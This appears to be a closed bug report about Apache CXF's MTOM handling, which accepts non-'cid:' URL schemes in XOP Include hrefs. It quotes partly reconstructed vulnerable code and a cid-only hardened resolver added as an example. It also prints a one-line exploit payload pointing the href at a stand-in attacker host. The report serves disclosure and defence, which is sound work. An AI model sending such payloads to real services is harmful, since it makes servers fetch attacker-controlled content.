Details
- Bug
- Status: Closed
- Major
- Resolution: Fixed
- 3.5.2
- None
- Unknown
Description
When used with a SOAP web service or a JAX-RS web service with MTOM enabled, the Unmarshaller allows the XOP Include element's href attribute to use any URL scheme. According to the W3C MTOM spec, only the "cid:" scheme should be allowed for href.
The affected call stack is:
AttachmentUtil.getAttachmentDataSource(String, Collection<Attachment>) line: 554
JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49
MTOMDecorator.startElement(TagName) line: 70
The source code is:
public static DataSource getAttachmentDataSource(String contentId, Collection<Attachment> atts) {
    // Is this right? - DD
    if (contentId.startsWith("cid:")) {
        try {
            // try body was lost in extraction; reconstructed here so the snippet compiles:
            // the "cid:" prefix is stripped and the Content-ID is percent-decoded
            contentId = URLDecoder.decode(contentId.substring(4), "UTF-8");
        } catch (UnsupportedEncodingException ue) {
            contentId = contentId.substring(4);
        }
        return loadDataSource(contentId, atts);
    } else if (contentId.indexOf("://") == -1) {
        // branch body was lost in extraction; reconstructed: a bare id is looked up among the attachments
        return loadDataSource(contentId, atts);
    } else {
        // should only take cid for XOP
        try {
            // try body was lost in extraction; reconstructed: any URL with a scheme is
            // resolved as a remote resource, which is the behaviour this report describes
            return new URLDataSource(new URL(contentId));
        } catch (MalformedURLException e) {
            throw new Fault(e);
        }
    }
}
An exploit can send a payload containing:
<stringvalue><inc:Include href="http://attackers.site/exploit/payload" xmlns:inc="http://www.w3.org/2004/08/xop/include"/></stringvalue>
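A hardened version of the href check, added here as an example that is not CXF's own code: it honours only cid: references (matched case-insensitively so that "CID:" cannot bypass it), percent-decodes the Content-ID, and refuses every other scheme instead of fetching it. The attachment map, the Content-ID and the helper names are constructed for the example.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import java.util.Map;

/** Resolves XOP Include hrefs against the message's attachments, allowing only the cid: scheme. */
public final class XopHrefResolver {

    /** Constructed sample attachment store keyed by Content-ID (without angle brackets). */
    private static final Map<String, byte[]> ATTACHMENTS = new HashMap<>();
    static {
        ATTACHMENTS.put("image1@example.org",
                "constructed attachment bytes".getBytes(StandardCharsets.UTF_8));
    }

    /** Returns the Content-ID named by a cid: href; any other href is rejected. */
    public static String contentIdFromHref(String href) {
        if (href == null || href.length() <= 4 || !href.regionMatches(true, 0, "cid:", 0, 4)) {
            // http:, file:, jar: and every other scheme end up here and are never fetched
            throw new IllegalArgumentException("XOP Include href must use the cid: scheme: " + href);
        }
        // Content-IDs may be percent-encoded in the href, e.g. "%40" for "@" (Java 10+ overload)
        String cid = URLDecoder.decode(href.substring(4), StandardCharsets.UTF_8);
        if (cid.isEmpty()) {
            throw new IllegalArgumentException("XOP Include href carries an empty Content-ID");
        }
        return cid;
    }

    /** Looks the referenced attachment up locally; unknown ids are an error, not a fallback. */
    public static byte[] resolve(String href) {
        String cid = contentIdFromHref(href);
        byte[] data = ATTACHMENTS.get(cid);
        if (data == null) {
            throw new IllegalArgumentException("no attachment with Content-ID " + cid);
        }
        return data;
    }

    public static void main(String[] args) {
        String[] hrefs = {"cid:image1%40example.org", "CID:image1@example.org",
                "cid:missing@example.org", "http://attackers.site/exploit/payload"};
        for (String href : hrefs) {
            try {
                System.out.println(href + " -> " + resolve(href).length + " bytes");
            } catch (IllegalArgumentException e) {
                System.out.println(href + " -> rejected: " + e.getMessage());
            }
        }
    }
}
```

Only the two cid: hrefs resolve to the stored attachment; the missing id and the http: URL are rejected before any network access could occur.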